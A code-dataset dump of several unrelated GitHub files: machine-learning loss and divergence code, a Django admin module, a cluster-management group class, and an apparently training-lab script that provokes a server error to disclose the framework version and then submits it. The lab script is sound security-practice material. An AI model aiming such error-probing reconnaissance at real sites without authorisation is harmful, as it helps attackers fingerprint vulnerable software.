2 * (V[t] @ Kwy)* (DKy @ V[t]) \n return 1/n * Trwx - 1/ m * Trwy\n \n \n \n \n\n\n######## Kernel density estimation ###############\n\n#base distribution sample\nx_tau = scs.multivariate_normal.rvs(np.zeros(2),np.identity(2),100) \n\n\ndef h(x,y,k):\n return np.mean(np.array([k(x,x_tau[i]) * k(y,x_tau[i]) * np.exp(np.linalg.norm(x_tau[i])) /(np.sqrt(2 * np.pi)) for i in range(len(x_tau))]))\n \n \n\ndef DE(x,k,y):\n n = len(x)\n return 1/n * np.sum(np.array([h(x[i],y,k) for i in range(n)]))\n\ndef KDE(x, y, k):\n n = len(x)\n Q = np.array([DE(x,k,x[i]) for i in range(n)])\n P = np.array([DE(y,k,x[i]) for i in range(n)])\n return 1/n * np.sum(np.log(Q) * Q - np.log(P) * Q)\n \n \n \n######### TRACE #######################\n\ndef K_trace(x,k):\n n = len(x)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Lambdx,_ = np.linalg.eig(Kx)\n return np.sum(Lambdx)\n \n\n\n", "repo_name": "cclementine25/KKL_div", "sub_path": "divergences.py", "file_name": "divergences.py", "file_ext": "py", "file_size_in_byte": 3976, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.real", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.real", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal.rvs", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 106, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 106, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "40398025849", "text": "# -*- coding: utf-8 -*-\n\nimport math\n\nimport torch\n\nfrom ncc.criterions import NccCriterion\nfrom ncc.data.constants import EPS\nfrom ncc.utils.logging import metrics\n\n\nclass TripletCriterion(NccCriterion):\n def __init__(self, task, sentence_avg):\n super().__init__(task)\n self.sentence_avg = sentence_avg\n self.margin = self.task.args['optimization']['margin']\n\n def forward(self, model, sample, reduce=True):\n \"\"\"Compute the loss for the given sample.\n\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n net_output = model(**sample['net_input'])\n loss, _ = self.compute_loss(model, net_output, reduce=reduce)\n sample_size = sample['target'].size(0) if self.sentence_avg else sample['ntokens']\n logging_output = {\n 'loss': loss.data,\n 'ntokens': sample_size,\n 'nsentences': sample_size,\n 'sample_size': sample_size,\n }\n return loss, sample_size, logging_output\n\n def compute_loss(self, repr, equal_ids):\n distance = torch.norm(repr.unsqueeze(dim=0) - repr.unsqueeze(dim=1), dim=-1, p=1) # B x B\n max_pos_distance = (distance * equal_ids).max(dim=-1)[0]\n neg_filter = distance <= (max_pos_distance + self.margin).unsqueeze(dim=-1)\n pos_mask = equal_ids + torch.eye(*equal_ids.size()).type_as(distance)\n neg_filter = neg_filter * (1 - pos_mask)\n avg_neg_distance = (distance * neg_filter).sum(dim=-1) / (neg_filter.sum(dim=-1) + EPS)\n min_neg_distance = (distance + pos_mask * 99999).min(dim=-1)[0]\n pos_filter = (distance >= (min_neg_distance - self.margin).unsqueeze(dim=-1)).type_as(distance)\n pos_filter = pos_filter * equal_ids\n avg_pos_distance = (distance * pos_filter).sum(dim=-1) / (pos_filter.sum(dim=-1) + EPS)\n triplet_loss = 0.5 * torch.relu(avg_pos_distance - min_neg_distance + self.margin) + \\\n 0.5 * torch.relu(max_pos_distance - avg_neg_distance + self.margin)\n triplet_loss = triplet_loss.sum()\n return triplet_loss, None\n\n @staticmethod\n def reduce_metrics(logging_outputs) -> None:\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n loss_sum = sum(log.get('loss', 0) for log in logging_outputs)\n # ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)\n sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)\n metrics.log_scalar('loss', loss_sum / sample_size / math.log(2), sample_size, round=3)\n\n @staticmethod\n def logging_outputs_can_be_summed() -> bool:\n \"\"\"\n Whether the logging outputs returned by `forward` can be summed\n across workers prior to calling `reduce_metrics`. Setting this\n to True will improves distributed training speed.\n \"\"\"\n return True\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc/criterions/type_prediction/_triplet.py", "file_name": "_triplet.py", "file_ext": "py", "file_size_in_byte": 3002, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ncc.criterions.NccCriterion", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.norm", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 41, "usage_type": "call"}, {"api_name": "ncc.data.constants.EPS", "line_number": 43, "usage_type": "name"}, {"api_name": "ncc.data.constants.EPS", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.relu", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.relu", "line_number": 49, "usage_type": "call"}, {"api_name": "ncc.utils.logging.metrics.log_scalar", "line_number": 59, "usage_type": "call"}, {"api_name": "ncc.utils.logging.metrics", "line_number": 59, "usage_type": "name"}, {"api_name": "math.log", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "74549878889", "text": "from django.contrib import admin\nfrom django.utils.html import mark_safe\nfrom . import models\n\n\n@admin.register(models.RoomType, models.Facility, models.HouseRule, models.Amenity)\nclass ItemAdmin(admin.ModelAdmin):\n\n \"\"\" item Admin Definition \"\"\"\n\n list_display = (\"name\", \"used_by\")\n\n def used_by(self, obj):\n return obj.rooms.count()\n\n\n# https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.TabularInline\nclass PhotoInLine(admin.TabularInline):\n model = models.Photo\n\n\n# ↑ 와 같음 보이는방식이 다름\n# class PhotoInLine(admin.StackedInline):\n# model = models.Photo\n\n\n@admin.register(models.Room)\nclass RoomAdmin(admin.ModelAdmin):\n\n \"\"\" Room Admin Definition \"\"\"\n\n inlines = [\n PhotoInLine,\n ]\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.ModelAdmin.fieldsets\n fieldsets = (\n (\n \"Basic Info\",\n {\"fields\": (\"name\", \"description\", \"country\", \"city\", \"address\", \"price\")},\n ),\n (\"Times\", {\"fields\": (\"check_in\", \"check_out\", \"instant_book\",)},),\n (\"Spaces\", {\"fields\": (\"guests\", \"beds\", \"bedrooms\", \"baths\",)}),\n (\n \"More About the Space\",\n {\n \"classes\": (\"collapse\",),\n \"fields\": (\"amenities\", \"facilitys\", \"houserules\",),\n },\n ),\n (\"Last Details\", {\"fields\": (\"host\",)}),\n )\n\n ordering = (\"name\", \"price\", \"bedrooms\")\n\n list_display = (\n \"name\",\n \"country\",\n \"city\",\n \"price\",\n \"guests\",\n \"beds\",\n \"bedrooms\",\n \"baths\",\n \"check_in\",\n \"check_out\",\n \"instant_book\",\n \"count_amenities\",\n \"count_photos\",\n \"total_rating\",\n \"created\",\n )\n\n list_filter = (\n \"instant_book\",\n \"host__superhost\",\n \"room_type\",\n \"amenities\",\n \"facilitys\",\n \"houserules\",\n \"city\",\n \"country\",\n )\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n # ^ , = , @ 설명이 나와있음\n search_fields = (\"^city\", \"^host__username\")\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n # ManyToManyField 에만 적용가능\n filter_horizontal = (\n \"amenities\",\n \"facilitys\",\n \"houserules\",\n )\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.ModelAdmin.raw_id_fields\n raw_id_fields = (\"host\",)\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n\n def save_model(self, request, obj, form, change):\n print(obj, form, change)\n super().save_model(request, obj, form, change)\n\n # obj == row\n def count_amenities(self, obj):\n return obj.amenities.count()\n\n def count_photos(self, obj):\n return obj.photos.count()\n\n def superuser(self, obj):\n return obj.host.superhost\n\n # 해당하는 column name 변경\n # count_amenities.short_description = \"hello sexy!\"\n count_photos.short_description = \"Photo_Count\"\n\n\n@admin.register(models.Photo)\nclass PhotoAdmin(admin.ModelAdmin):\n\n \"\"\" Photo Admin Difinition \"\"\"\n\n list_display = (\"__str__\", \"get_thumnail\")\n\n def get_thumnail(self, obj):\n # print(dir(obj.file))\n\n # mark_safe : django 의 각종 security 때문에 웹사이트가 javascript ,html 등\n # 각종 명령어를 읽지 못하게 막아놓은것을 풀어줌\n # ( django 에게 안전한 String 인것을 알림 )\n return mark_safe(f'')\n\n get_thumnail.short_description = \"Thumnail\"\n\n", "repo_name": "gygy2006/airbnb-clone", "sub_path": "rooms/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 3663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.contrib.admin.TabularInline", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 121, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 121, "usage_type": "name"}, {"api_name": "django.utils.html.mark_safe", "line_number": 133, "usage_type": "call"}, {"api_name": "django.contrib.admin.register", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 120, "usage_type": "name"}]} +{"seq_id": "8811037141", "text": "# Information disclosure in error messages\n\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef get_version(s, url):\n\tprint('\\n[+] Trying to produce an error passing a non-integer value to productId parameter...')\n\tpath = url + '/product?productId=\"gwyo\"'\n\tprint(path)\n\tr = s.get(path)\n\ttime.sleep(1)\n\tprint(r.text)\n\tframework = r.text.encode().split(b'\\n\\n')[1].decode()\n\tprint('\\n[+] Found Framework version:\\t\\t%s' % framework)\n\ttime.sleep(1)\n\tversion = framework.replace('Apache Struts ', '')\n\treturn version\n\ndef submit_version(s, url, version):\n\tprint('[+] Trying to submit the version to solve the lab...')\n\tsubmit_path = url + '/submitSolution'\n\tsubmit_data = {\"answer\": version}\n\tr = s.post(submit_path, data=submit_data)\n\ttime.sleep(1)\n\treturn r\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: Information disclosure in error messages')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif '

Error

' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to retrieve the number version of the framework...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\tversion = get_version(s, url)\n\t\t\tr = submit_version(s, url, version)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n", "repo_name": "gwyomarch/WebSecurityAcademy", "sub_path": "InformationDisclosure/exploit-lab01.py", "file_name": "exploit-lab01.py", "file_ext": "py", "file_size_in_byte": 2644, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib3.disable_warnings", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib3.exceptions", "line_number": 12, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "requests.Session", "line_number": 56, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 61, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 64, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 67, "usage_type": "call"}, {"api_name": "urllib.parse.parse.urlparse", "line_number": 68, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 68, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 68, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 81, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 85, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "41494343522", "text": "__author__ = 'Sumit Sharma'\n__copyright__ = 'Copyright 2022, Luna2 Project'\n__license__ = 'GPL'\n__version__ = '2.0'\n__maintainer__ = 'Sumit Sharma'\n__email__ = 'sumit.sharma@clustervision.com'\n__status__ = 'Development'\n\nfrom base64 import b64encode\nfrom concurrent.futures import ThreadPoolExecutor\nfrom utils.database import Database\nfrom utils.log import Log\nfrom utils.config import Config\nfrom utils.queue import Queue\nfrom utils.helper import Helper\nfrom common.constant import CONSTANT\n\n\nclass Group():\n \"\"\"\n This class is responsible for all operations on groups.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n This constructor will initialize all required variables here.\n \"\"\"\n self.logger = Log.get_logger()\n self.plugins_path=CONSTANT[\"PLUGINS\"][\"PLUGINS_DIR\"]\n\n\n def get_all_group(self):\n \"\"\"\n This method will return all the groups in detailed format.\n \"\"\"\n groups = Database().get_record(None, 'group', None)\n if groups:\n response = {'config': {'group': {} }}\n for group in groups:\n name = group['name']\n group_id = group['id']\n group_interface = Database().get_record_join(\n ['groupinterface.interface','network.name as network','groupinterface.options'],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n if group_interface:\n group['interfaces'] = []\n for interface in group_interface:\n interface['options'] = interface['options'] or \"\"\n group['interfaces'].append(interface)\n del group['id']\n group['setupbmc'] = Helper().make_bool(group['setupbmc'])\n group['netboot'] = Helper().make_bool(group['netboot'])\n group['localinstall'] = Helper().make_bool(group['localinstall'])\n group['bootmenu'] = Helper().make_bool(group['bootmenu'])\n group['osimage'] = Database().name_by_id('osimage', group['osimageid'])\n del group['osimageid']\n if group['bmcsetupid']:\n group['bmcsetupname'] = Database().name_by_id('bmcsetup', group['bmcsetupid'])\n del group['bmcsetupid']\n response['config']['group'][name] = group\n self.logger.info('Provided list of all groups with details.')\n else:\n self.logger.error('No group is available.')\n response = 'No group is available'\n return False, response\n return True,response\n\n\n def get_group(self, name=None):\n \"\"\"\n This method will return requested group in detailed format.\n \"\"\"\n # things we have to set for a group\n items = {\n # 'prescript': '',\n # 'partscript': '',\n # 'postscript': '',\n 'setupbmc':False,\n 'netboot':False,\n 'localinstall':False,\n 'bootmenu':False,\n 'provision_interface':'BOOTIF',\n 'provision_method': 'torrent',\n 'provision_fallback': 'http'\n }\n # same as above but now specifically base64\n b64items = {'prescript': '', 'partscript': '', 'postscript': ''}\n cluster = Database().get_record(None, 'cluster', None)\n groups = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if groups:\n response = {'config': {'group': {} }}\n group = groups[0]\n group_id = group['id']\n group_interface = Database().get_record_join(\n [\n 'groupinterface.interface',\n 'network.name as network',\n 'groupinterface.options'\n ],\n ['network.id=groupinterface.networkid'],\n [f\"groupid = '{group_id}'\"]\n )\n if group_interface:\n group['interfaces'] = []\n for interface in group_interface:\n if not interface['options']:\n del interface['options']\n group['interfaces'].append(interface)\n del group['id']\n for key, value in items.items():\n if key in cluster[0] and ((not key in group) or (not group[key])):\n if isinstance(value, bool):\n cluster[0][key] = str(Helper().make_bool(cluster[0][key]))\n group[key] = str(cluster[0][key])\n group[key+'_source'] = 'cluster'\n elif key in group and group[key]:\n if isinstance(value, bool):\n group[key] = str(Helper().make_bool(group[key]))\n group[key+'_source'] = 'group'\n group[key] = group[key] or str(value)\n else:\n group[key] = str(value)\n group[key+'_source'] = 'default'\n try:\n for key, value in b64items.items():\n default_str = str(value)\n default_data = b64encode(default_str.encode())\n default_data = default_data.decode(\"ascii\")\n if key in group and group[key]:\n group[key] = group[key] or default_data\n group[key+'_source'] = 'group'\n else:\n group[key] = default_data\n group[key+'_source'] = 'default'\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n\n group['osimage'] = Database().name_by_id('osimage', group['osimageid'])\n del group['osimageid']\n if group['bmcsetupid']:\n group['bmcsetupname'] = Database().name_by_id('bmcsetup', group['bmcsetupid'])\n del group['bmcsetupid']\n # ---\n if group['osimagetagid']:\n group['osimagetag'] = Database().name_by_id('osimagetag', group['osimagetagid']) or 'default'\n else:\n group['osimagetag'] = 'default'\n del group['osimagetagid']\n group['osimage_source'] = 'group'\n group['bmcsetupname_source'] = 'group'\n group['osimagetag_source'] = 'group'\n if group['osimagetag'] == 'default':\n group['osimagetag_source'] = 'default'\n # ---\n response['config']['group'][name] = group\n self.logger.info(f'Returned Group {name} with Details.')\n else:\n self.logger.error('No group is available.')\n response = 'No group is available'\n return False,response\n return True,response\n\n\n def get_group_member(self, name=None):\n \"\"\"\n This method will return all the list of all the member node names for a group.\n \"\"\"\n status=False\n groups = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if groups:\n group = groups[0]\n groupid = group['id']\n response = {'config': {'group': {name: {'members': []}} }}\n node_list = Database().get_record(None, 'node', f' WHERE groupid = \"{groupid}\"')\n if node_list:\n nodes = []\n for node in node_list:\n nodes.append(node['name'])\n response['config']['group'][name]['members'] = nodes\n self.logger.info(f'Provided all group member nodes {nodes}.')\n status=True\n else:\n self.logger.error(f'Group {name} is not have any member node.')\n response = f'Group {name} is not have any member node'\n status=False\n else:\n self.logger.error(f'Group {name} is not available.')\n response = f'Group {name} is not available'\n status=False\n return status, response\n\n\n def update_group(self, name=None, request_data=None):\n \"\"\"\n This method will create or update a group.\n \"\"\"\n data = {}\n status=False\n response=\"Internal error\"\n # things we have to set for a group\n items = {\n 'prescript': '',\n 'partscript': 'bW91bnQgLXQgdG1wZnMgdG1wZnMgL3N5c3Jvb3QK',\n 'postscript': 'ZWNobyAndG1wZnMgLyB0bXBmcyBkZWZhdWx0cyAwIDAnID4+IC9zeXNyb290L2V0Yy9mc3RhYgo=',\n 'setupbmc': False,\n 'netboot': True,\n 'localinstall': False,\n 'bootmenu': False,\n 'provision_interface': 'BOOTIF'\n }\n create, update = False, False\n if request_data:\n data = request_data['config']['group'][name]\n oldgroupname = None\n group = Database().get_record(None, 'group', f' WHERE name = \"{name}\"')\n if group:\n group_id = group[0]['id']\n if 'newgroupname' in data:\n newgroupname = data['newgroupname']\n oldgroupname = name\n where = f' WHERE `name` = \"{newgroupname}\"'\n check_group = Database().get_record(None, 'group', where)\n if check_group:\n status=False\n return status, f'{newgroupname} Already present in database'\n else:\n data['name'] = data['newgroupname']\n del data['newgroupname']\n update = True\n else:\n if 'newgroupname' in data:\n status=False\n return status, 'Invalid request: newgroupname is not allowed while creating a new group'\n if 'interfaces' not in data:\n controller = Database().get_record_join(\n ['network.name as network'],\n ['ipaddress.tablerefid=controller.id','network.id=ipaddress.networkid'],\n ['tableref=\"controller\"', 'controller.hostname=\"controller\"']\n )\n data['interfaces']=[]\n if controller:\n data['interfaces'].append(\n {\n 'interface': 'BOOTIF',\n 'network': controller[0]['network']\n })\n create = True\n\n # we reset to make sure we don't assing something that won't work\n if 'osimage' in data:\n data['osimagetagid'] = \"default\"\n\n for key, value in items.items():\n if key in data:\n data[key] = data[key]\n if isinstance(value, bool):\n data[key] = str(Helper().bool_to_string(data[key]))\n elif create:\n data[key] = value\n if isinstance(value, bool):\n data[key] = str(Helper().bool_to_string(data[key]))\n if key in data and (not data[key]) and (key not in items):\n del data[key]\n\n if 'bmcsetupname' in data:\n bmcsetupname = data['bmcsetupname']\n data['bmcsetupid'] = Database().id_by_name('bmcsetup', data['bmcsetupname'])\n if data['bmcsetupid']:\n del data['bmcsetupname']\n else:\n status=False\n return status, f'BMC Setup {bmcsetupname} does not exist'\n if 'osimage' in data:\n osimage = data['osimage']\n data['osimageid'] = Database().id_by_name('osimage', osimage)\n if data['osimageid']:\n del data['osimage']\n else:\n status=False\n return status, f'OSimage {osimage} does not exist'\n\n new_interface = None\n if 'interfaces' in data:\n new_interface = data['interfaces']\n del data['interfaces']\n\n if 'osimagetag' in data:\n osimagetag = data['osimagetag']\n del data['osimagetag']\n if osimagetag == \"\":\n data['osimagetagid'] = \"\"\n else:\n osimagetagids = None\n if 'osimageid' in data:\n osimagetagids = Database().get_record(None, 'osimagetag', f\" WHERE osimageid = '{data['osimageid']}' AND name = '{osimagetag}'\")\n elif group and 'osimageid' in group[0]:\n osimagetagids = Database().get_record(None, 'osimagetag', f\" WHERE osimageid = '{group[0]['osimageid']}' AND name = '{osimagetag}'\")\n if osimagetagids:\n data['osimagetagid'] = osimagetagids[0]['id']\n else:\n status = False\n return status, 'Unknown tag, or osimage and tag not related'\n\n group_columns = Database().get_columns('group')\n column_check = Helper().compare_list(data, group_columns)\n if column_check:\n if update:\n where = [{\"column\": \"id\", \"value\": group_id}]\n row = Helper().make_rows(data)\n Database().update('group', row, where)\n response = f'Group {name} updated successfully'\n status=True\n if create:\n data['name'] = name\n row = Helper().make_rows(data)\n group_id = Database().insert('group', row)\n response = f'Group {name} created successfully'\n status=True\n if new_interface:\n for ifx in new_interface:\n if not 'interface' in ifx:\n status=False\n return status, 'Interface name is required for this operation'\n interface_name = ifx['interface']\n network = None\n if not 'network' in ifx:\n nwk=Database().get_record_join(\n ['network.name as network', 'network.id as networkid'],\n [\n 'network.id=groupinterface.networkid',\n 'groupinterface.groupid=group.id'\n ],\n [\n f\"`group`.name='{name}'\",\n f\"groupinterface.interface='{interface_name}'\"\n ]\n )\n if nwk and 'networkid' in nwk[0]:\n network=nwk[0]['networkid']\n else:\n network = Database().id_by_name('network', ifx['network'])\n del ifx['network']\n if network is None:\n status=False\n return status, 'Network not provided or does not exist'\n else:\n ifx['networkid'] = network\n ifx['groupid'] = group_id\n group_clause = f'groupid = \"{group_id}\"'\n # network_clause = f'networkid = \"{network}\"'\n interface_clause = f'interface = \"{interface_name}\"'\n where = f' WHERE {group_clause} AND {interface_clause}'\n # where += f' AND {interface_clause}'\n check_interface = Database().get_record(None, 'groupinterface', where)\n result, queue_id = None, None\n if not check_interface:\n row = Helper().make_rows(ifx)\n result = Database().insert('groupinterface', row)\n self.logger.info(f'Interface created => {result} .')\n queue_id, _ = Queue().add_task_to_queue(\n f'add_interface_to_group_nodes:{name}:{interface_name}',\n 'group_interface'\n )\n else: # we update only\n row = Helper().make_rows(ifx)\n where = [\n {\"column\": \"groupid\", \"value\": group_id},\n {\"column\": \"interface\", \"value\": interface_name}\n ]\n result = Database().update('groupinterface', row, where)\n self.logger.info(f'Interface updated => {result} .')\n queue_id, _ = Queue().add_task_to_queue(\n f'update_interface_for_group_nodes:{name}:{interface_name}',\n 'group_interface'\n )\n # below section takes care(in the background) the adding/renaming/deleting.\n # for adding next free ip-s will be selected. time consuming there for\n # background\n if result:\n next_id = Queue().next_task_in_queue('group_interface')\n if queue_id == next_id:\n executor = ThreadPoolExecutor(max_workers=1)\n executor.submit(Config().update_interface_on_group_nodes,name)\n executor.shutdown(wait=False)\n # Config().update_interface_on_group_nodes(name)\n\n # ---- we call the group plugin - maybe someone wants to run something after create/update?\n nodes_in_group = []\n group_details=Database().get_record_join(['node.name AS nodename'],['node.groupid=group.id'],[f\"`group`.name='{name}'\"])\n if group_details:\n for group_detail in group_details:\n nodes_in_group.append(group_detail['nodename'])\n group_plugins = Helper().plugin_finder(f'{self.plugins_path}/group')\n group_plugin=Helper().plugin_load(group_plugins,'group','default')\n try:\n if oldgroupname and newgroupname:\n group_plugin().rename(name=oldgroupname, newname=newgroupname)\n elif create:\n group_plugin().postcreate(name=name, nodes=nodes_in_group)\n elif update:\n group_plugin().postupdate(name=name, nodes=nodes_in_group)\n except Exception as exp:\n self.logger.error(f\"{exp}\")\n\n else:\n status=False\n response = 'Invalid request: Columns are incorrect'\n else:\n status=False\n response = 'Invalid request: Did not receive data'\n return status, response\n\n\n def clone_group(self, name=None, request_data=None):\n \"\"\"\n This method will clone a group.\n \"\"\"\n data = {}\n status=False\n response=\"Internal error\"\n # things we have to set for a group\n items = 